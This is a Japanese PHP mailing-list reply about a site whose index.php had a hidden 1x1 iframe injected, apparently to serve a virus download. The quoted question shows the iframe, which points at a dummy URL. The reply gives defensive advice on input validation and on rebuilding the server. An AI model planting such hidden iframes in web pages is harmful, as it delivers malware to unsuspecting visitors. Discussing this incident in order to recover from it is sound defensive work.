[PHP-users 32322] Re: index.phpに対する、不正な書き換え

[鈴木孝征]

ナカハラさんへ。鈴木と申します。

> ■先日、自分の管理していたサイトのPHPのスクリプトの一部に、以下のような
> コードが勝手に挿入されてしまいました。
> 
> <iframe src='http://dummy/logo/index.php' width='1' height='1'
> style='visibility: hidden;'></iframe>
> 
> リンク先のURLはダミーですが、ウイルスをダウンロードさせるためのリンク
> のようです。
> 
> 自分の書いているPHPのスクリプトに脆弱性があるのかと思うのですが、検討が
> つきません。どなたかこのような事例について、ご存知ないでしょうか？

execやsystemといった関数に不正な値を混入させて書き換えるとか、fopenで開
くファイル名に不正な値を送るとかいろいろなところに脆弱性は潜むことができ
るので、ユーザーの入力値($_REQUESTや$_COOKIE)をスクリプト内で利用してい
るところを全て見直す必要があると思います。

でもその前に、PHPスクリプト以外の部分でクラックされている可能性はどうし
て考えられないのでしょうか。

ナカハラさんが管理しているサーバーであればネットからの切り離しとOSの再イ
ンストールが必要だと思います。